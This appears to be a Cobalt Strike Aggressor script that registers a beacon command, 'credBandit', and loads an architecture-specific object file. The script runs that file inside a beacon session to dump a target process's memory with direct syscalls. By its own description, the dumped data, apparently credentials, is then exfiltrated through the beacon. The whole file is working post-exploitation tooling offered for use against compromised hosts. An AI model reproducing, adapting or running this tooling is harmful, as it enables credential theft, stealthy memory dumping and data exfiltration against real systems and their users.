#Register command
beacon_command_register(
"credBandit", 
"runs an all in memory custom MiniDumpWriteDump implementation using static x64 syscalls and exfiltrates the data back through your beacon or can write to disk.", 
"Synopsis: credBandit [targit PID]");
alias credBandit {
    local('$barch $handle $data $args');
    
    # figure out the arch of this session
    $barch  = barch($1);
    
    # read in the right BOF file
    $handle = openf(script_resource("credBandit $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);
    if(size(@_) < 2)
    {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("credBandit"));
        return;
    }
	
    # pack our arguments
    $args = bof_pack($1, "iz", $2, $3);

    # announce what we're doing 
    btask($1, "Running credBandit by (@anthemtotheego)");

    # execute it.
    beacon_inline_execute($1, $data, "go", $args);
}



